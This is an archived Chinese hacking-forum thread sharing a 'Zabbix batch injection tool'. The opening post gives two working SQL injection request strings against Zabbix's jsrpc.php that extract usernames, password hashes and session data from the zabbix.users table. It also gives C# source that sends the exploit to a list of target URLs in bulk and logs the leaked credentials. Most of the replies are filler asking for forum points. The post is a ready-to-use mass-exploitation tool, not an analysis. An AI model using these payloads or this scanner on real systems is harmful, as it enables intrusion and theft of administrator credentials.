Select Browser Mobile | Continue

Silic Group Froum Archive - Silic Security

 Forgot Password?
 Join Us
Search
Show: 1111|Reply: 19

[案例下载] Zabbix批量注入工具+源码

[Copy URL]
彭妈妈 The user has been deleted
Posted 2016-8-27 23:32:18 | Show all replies |Read Mode
本帖最后由 彭妈妈 于 2016-9-10 17:18 编辑

QQ图片20160827224514.png

下载地址:http://pan.baidu.com/s/1bpbtPDH

获取账号密码:
  1. /jsrpc.php?type=9&method=screen.get×tamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1+or+updatexml(1,(select(select+concat(0x7e,alias,0x7e,passwd,0x7e))+from+zabbix.users+LIMIT+0,1),1)+or+1=1)%23&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17
Copy

获取session:
  1. /jsrpc.php?type=9&method=screen.get×tamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1%20or%20(select%201%20from%20(select%20count(*),concat((select%20(select%20concat(passwd))%20from%20zabbix.users%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20or%201=1)%23&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17
Copy


程序源码
  1. string Url = textBoxUrl.Text;
  2.             string[] Urls = Url.Split(Environment.NewLine.ToCharArray());
  3.             string ExP = "/jsrpc.php?type=9&method=screen.get×tamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1+or+updatexml(1,(select(select+concat(0x7e,alias,0x7e,passwd,0x7e))+from+zabbix.users+LIMIT+0,1),1)+or+1=1)%23&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17";
  4.             for (int i = 0; i < Urls.Length; i++)
  5.             {
  6.                 string BaseUrl = Urls.Trim();//设置请求的地址
  7.                 try
  8.                 {
  9.                     if (BaseUrl.Length != 0)
  10.                     {
  11.                         if (BaseUrl.IndexOf("http") == -1)
  12.                         {
  13.                             BaseUrl ="http://"+ BaseUrl ;
  14.                         }
  15.                         Console.WriteLine(BaseUrl);
  16.                         HttpCode = new HttpCode();
  17.                         CookieContainer cc = new CookieContainer(); //请求自动处理cookie
  18.                         HttpResults hr = HttpCode.GetHtml(BaseUrl + ExP, cc);//发起请求
  19.                         if (hr.Html.Length != 0)
  20.                         {
  21.                             string Res = HttpCode.GetStringMid(hr.Html, "syntax error:", "]");
  22.                             if (Res.Length != 0)
  23.                             {
  24.                                 textBoxData.AppendText(BaseUrl + "----" + Res + "\r\n");
  25.                             }
  26.                             else
  27.                             {
  28.                                 textBoxData.AppendText(BaseUrl + "----不存在此漏洞" + "\r\n");
  29.                             }
  30.                         }
  31.                         else
  32.                         {
  33.                             textBoxData.AppendText(BaseUrl + "----不存在此漏洞" + "\r\n");
  34.                         }
  35.                     }
  36.                 }
  37.                 catch (Exception)
  38.                 {
  39.                     throw;
  40.                 }
  41.             }
  42.             textBoxData.AppendText("\r\n----------------注入完毕");
Copy




大佬们给点积分呗。。

Posted 2016-8-28 00:39:22 | Show all replies
兄弟啊。别隐藏才能给分(⊙o⊙)哦。
莫须有 The user has been deleted
Posted 2016-8-28 00:43:48 | Show all replies
回帖是一种美德
pkko881 The user has been deleted
Posted 2016-8-28 19:25:59 | Show all replies

回帖是一种美德
zd19920303 The user has been deleted
Posted 2016-8-29 19:21:02 | Show all replies


回帖是一种美德
mvpbin The user has been deleted
Posted 2016-8-30 07:35:09 | Show all replies
回帖是一种美德
zbcoolen The user has been deleted
Posted 2016-8-30 12:10:52 | Show all replies
Zabbix批量注入工具+源码
blsn3548 The user has been deleted
Posted 2016-9-2 17:56:54 | Show all replies
感谢分享经验
406094055 The user has been deleted
Posted 2016-9-3 11:50:04 | Show all replies
老规矩,先回后下!!!!!!!
CR7sun The user has been deleted
Posted 2016-9-3 19:50:43 | Show all replies
回帖是一种美德~
ff748596 The user has been deleted
Posted 2016-9-4 23:21:13 | Show all replies
学习学习!!
Msl The user has been deleted
Posted 2016-9-6 11:10:47 | Show all replies
又隐藏..................
Anonymous丶L The user has been deleted
Posted 2016-9-6 15:55:35 | Show all replies
看看是不是爬的zoomeye的~~
局长大人 The user has been deleted
Posted 2016-9-8 09:56:55 | Show all replies

看看是不是爬的zoomeye的~~
blackdawn The user has been deleted
Posted 2016-9-8 22:10:06 | Show all replies
6666666666666666666666666666666666666666
lianfeng The user has been deleted
Posted 2016-9-10 21:46:32 | Show all replies
bucuo..........
nanzhimugua The user has been deleted
Posted 2016-9-12 09:12:31 | Show all replies
                                 
fengzi The user has been deleted
Posted 2016-9-13 22:26:02 | Show all replies
先回帖再看
捡垃圾的小白 The user has been deleted
Posted 2016-9-13 23:40:45 | Show all replies
回帖是一种美德
icesky The user has been deleted
Posted 2016-9-14 16:55:17 | Show all replies
前段时间 爆出来的,貌似官网后面的版本已经修复了
You need to login before reply! Login | Join Us

Credit Rules of This Forum

Close

公告Privious /1 Next

小黑屋|手机版|Archiver|Silic Security

GMT+8, 2017-4-28 08:31

© 2001-2014 Silic Corp.

Quick Reply Top Return List